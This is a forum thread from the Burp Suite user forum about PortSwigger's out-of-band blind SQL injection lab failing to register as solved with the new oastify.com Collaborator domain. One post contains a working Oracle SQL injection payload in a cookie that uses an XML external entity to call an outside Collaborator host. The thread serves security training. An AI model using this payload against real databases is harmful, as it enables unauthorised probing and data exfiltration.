Burp Suite User Forum


Blind SQLi OOB interaction does not work with collaborator on oastify.com

Artur | Last updated: May 01, 2022 11:00AM UTC

Hi, when using Collaborator for "Lab: Blind SQL injection with out-of-band interaction" it works in Burp, but it is not marked as completed, perhaps because "checks" are checking a different (older) Burp Collaborator domain.

Ben, PortSwigger Agent | Last updated: May 03, 2022 08:17AM UTC

Hi Artur, We are in the process of updating this and some of the other labs so that they can be solved using the new Burp Collaborator domain. We will update this forum post when this work has been carried out.

Yan | Last updated: May 05, 2022 03:28PM UTC

Thanks please.

Antonio | Last updated: Jun 26, 2022 02:59PM UTC

Hi, I have been experiencing the same problem with many (or all, for that matter) out of band challenges, not receiving the expected answer since the oastify domain is used for collaborator. I was going to create a new post, but I think this one is my same problem. I guess we need to wait so that they become operative once again. Thanks, keep up the good work!

Ben, PortSwigger Agent | Last updated: Jun 27, 2022 06:48AM UTC

Hi both, Yan - the 'Blind SQL injection with out-of-band interaction' lab should now be solvable with the oastify.com domain. Antonio - which labs are you having issues with?

Yan | Last updated: Sep 01, 2022 02:23PM UTC

Hi Ben, are you sure? I tested it again and I get a 504 gateway timeout.

Cookie: TrackingId=z3XAmvGIOJr6jQFe'+||+(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"w2zb7jci8muaxbmw0ifssw5gg7mzao.oastify.com">+%25remote%3b]>'),'/l')+FROM+dual)--;

Response:

HTTP/1.1 504 Gateway Timeout
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 197

<html><head><title>Server Error: Gateway Timeout</title></head><body><h1>Server Error: Gateway Timeout (0) connecting to 0aa60071036ce426c0ec680700500020.web-security-academy.net</h1></body></html>

Ben, PortSwigger Agent | Last updated: Sep 02, 2022 06:48AM UTC

Hi Yan, Yes, the lab appears to be working as expected: https://snipboard.io/aAYjSi.jpg Is your lab instance still active when you attempt this (can you browse to the lab in a normal browser)? Is your payload correct?
